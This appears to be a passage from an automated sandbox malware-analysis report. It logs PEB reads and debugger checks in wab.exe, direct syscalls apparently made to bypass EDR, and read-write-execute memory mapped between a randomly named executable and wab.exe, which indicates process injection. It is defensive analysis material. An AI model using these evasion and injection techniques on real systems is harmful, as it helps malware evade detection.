Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9340D mov eax, dword ptr fs:[00000030h] 25_2_21F9340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h] 25_2_21FA8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h] 25_2_21FA8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA8402 mov eax, dword ptr fs:[00000030h] 25_2_21FA8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F747FB mov eax, dword ptr fs:[00000030h] 25_2_21F747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F747FB mov eax, dword ptr fs:[00000030h] 25_2_21F747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h] 25_2_21F927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h] 25_2_21F927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F927ED mov eax, dword ptr fs:[00000030h] 25_2_21F927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7D7E0 mov ecx, dword ptr fs:[00000030h] 25_2_21F7D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h] 25_2_21F717EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h] 25_2_21F717EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F717EC mov eax, dword ptr fs:[00000030h] 25_2_21F717EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h] 25_2_21F757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h] 25_2_21F757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F757C0 mov eax, dword ptr fs:[00000030h] 25_2_21F757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D7B0 mov eax, dword ptr fs:[00000030h] 25_2_21F9D7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6F7BA mov eax, dword ptr fs:[00000030h] 25_2_21F6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h] 25_2_21FFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h] 25_2_21FFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h] 25_2_21FFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h] 25_2_21FFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FFF7AF mov eax, dword ptr fs:[00000030h] 25_2_21FFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F453 mov eax, dword ptr fs:[00000030h] 25_2_2202F453
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF97A9 mov eax, dword ptr fs:[00000030h] 25_2_21FF97A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F707AF mov eax, dword ptr fs:[00000030h] 25_2_21F707AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2204547F mov eax, dword ptr fs:[00000030h] 25_2_2204547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F78770 mov eax, dword ptr fs:[00000030h] 25_2_21F78770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F80770 mov eax, dword ptr fs:[00000030h] 25_2_21F80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h] 25_2_21F6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h] 25_2_21F6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h] 25_2_21F6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6B765 mov eax, dword ptr fs:[00000030h] 25_2_21F6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F70750 mov eax, dword ptr fs:[00000030h] 25_2_21F70750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF4755 mov eax, dword ptr fs:[00000030h] 25_2_21FF4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2750 mov eax, dword ptr fs:[00000030h] 25_2_21FB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2750 mov eax, dword ptr fs:[00000030h] 25_2_21FB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA674D mov esi, dword ptr fs:[00000030h] 25_2_21FA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA674D mov eax, dword ptr fs:[00000030h] 25_2_21FA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA674D mov eax, dword ptr fs:[00000030h] 25_2_21FA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h] 25_2_21F83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h] 25_2_21F83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F83740 mov eax, dword ptr fs:[00000030h] 25_2_21F83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69730 mov eax, dword ptr fs:[00000030h] 25_2_21F69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F69730 mov eax, dword ptr fs:[00000030h] 25_2_21F69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA273C mov eax, dword ptr fs:[00000030h] 25_2_21FA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA273C mov ecx, dword ptr fs:[00000030h] 25_2_21FA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA273C mov eax, dword ptr fs:[00000030h] 25_2_21FA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA5734 mov eax, dword ptr fs:[00000030h] 25_2_21FA5734
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F73720 mov eax, dword ptr fs:[00000030h] 25_2_21F73720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h] 25_2_21F8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h] 25_2_21F8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8F720 mov eax, dword ptr fs:[00000030h] 25_2_21F8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC720 mov eax, dword ptr fs:[00000030h] 25_2_21FAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC720 mov eax, dword ptr fs:[00000030h] 25_2_21FAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220454DB mov eax, dword ptr fs:[00000030h] 25_2_220454DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAF71F mov eax, dword ptr fs:[00000030h] 25_2_21FAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAF71F mov eax, dword ptr fs:[00000030h] 25_2_21FAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F70710 mov eax, dword ptr fs:[00000030h] 25_2_21F70710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA0710 mov eax, dword ptr fs:[00000030h] 25_2_21FA0710
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F77703 mov eax, dword ptr fs:[00000030h] 25_2_21F77703
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F75702 mov eax, dword ptr fs:[00000030h] 25_2_21F75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F75702 mov eax, dword ptr fs:[00000030h] 25_2_21F75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC700 mov eax, dword ptr fs:[00000030h] 25_2_21FAC700
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_22044500 mov eax, dword ptr fs:[00000030h] 25_2_22044500
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF06F1 mov eax, dword ptr fs:[00000030h] 25_2_21FF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FF06F1 mov eax, dword ptr fs:[00000030h] 25_2_21FF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA36EF mov eax, dword ptr fs:[00000030h] 25_2_21FA36EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D6E0 mov eax, dword ptr fs:[00000030h] 25_2_21F9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F9D6E0 mov eax, dword ptr fs:[00000030h] 25_2_21F9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA16CF mov eax, dword ptr fs:[00000030h] 25_2_21FA16CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7B6C0 mov eax, dword ptr fs:[00000030h] 25_2_21F7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA6C7 mov ebx, dword ptr fs:[00000030h] 25_2_21FAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA6C7 mov eax, dword ptr fs:[00000030h] 25_2_21FAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h] 25_2_21F676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h] 25_2_21F676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F676B2 mov eax, dword ptr fs:[00000030h] 25_2_21F676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA66B0 mov eax, dword ptr fs:[00000030h] 25_2_21FA66B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6D6AA mov eax, dword ptr fs:[00000030h] 25_2_21F6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F6D6AA mov eax, dword ptr fs:[00000030h] 25_2_21F6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAC6A6 mov eax, dword ptr fs:[00000030h] 25_2_21FAC6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA2674 mov eax, dword ptr fs:[00000030h] 25_2_21FA2674
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA9660 mov eax, dword ptr fs:[00000030h] 25_2_21FA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA9660 mov eax, dword ptr fs:[00000030h] 25_2_21FA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA660 mov eax, dword ptr fs:[00000030h] 25_2_21FAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAA660 mov eax, dword ptr fs:[00000030h] 25_2_21FAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8C640 mov eax, dword ptr fs:[00000030h] 25_2_21F8C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220035BA mov eax, dword ptr fs:[00000030h] 25_2_220035BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220035BA mov eax, dword ptr fs:[00000030h] 25_2_220035BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220035BA mov eax, dword ptr fs:[00000030h] 25_2_220035BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220035BA mov eax, dword ptr fs:[00000030h] 25_2_220035BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_2202F5BE mov eax, dword ptr fs:[00000030h] 25_2_2202F5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220455C9 mov eax, dword ptr fs:[00000030h] 25_2_220455C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h] 25_2_220435D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h] 25_2_220435D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_220435D7 mov eax, dword ptr fs:[00000030h] 25_2_220435D7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA6620 mov eax, dword ptr fs:[00000030h] 25_2_21FA6620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FA8620 mov eax, dword ptr fs:[00000030h] 25_2_21FA8620
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F7262C mov eax, dword ptr fs:[00000030h] 25_2_21F7262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8E627 mov eax, dword ptr fs:[00000030h] 25_2_21F8E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F73616 mov eax, dword ptr fs:[00000030h] 25_2_21F73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F73616 mov eax, dword ptr fs:[00000030h] 25_2_21F73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2619 mov eax, dword ptr fs:[00000030h] 25_2_21FB2619
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21F8260B mov eax, dword ptr fs:[00000030h] 25_2_21F8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FAF603 mov eax, dword ptr fs:[00000030h] 25_2_21FAF603
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E724E GetProcessHeap, 8_2_222E724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_222E2639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_222E2B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_222E60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_222E60E2

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe NtCreateKey: Direct from: 0x76EF2C6C
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe protection: execute and read and write
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
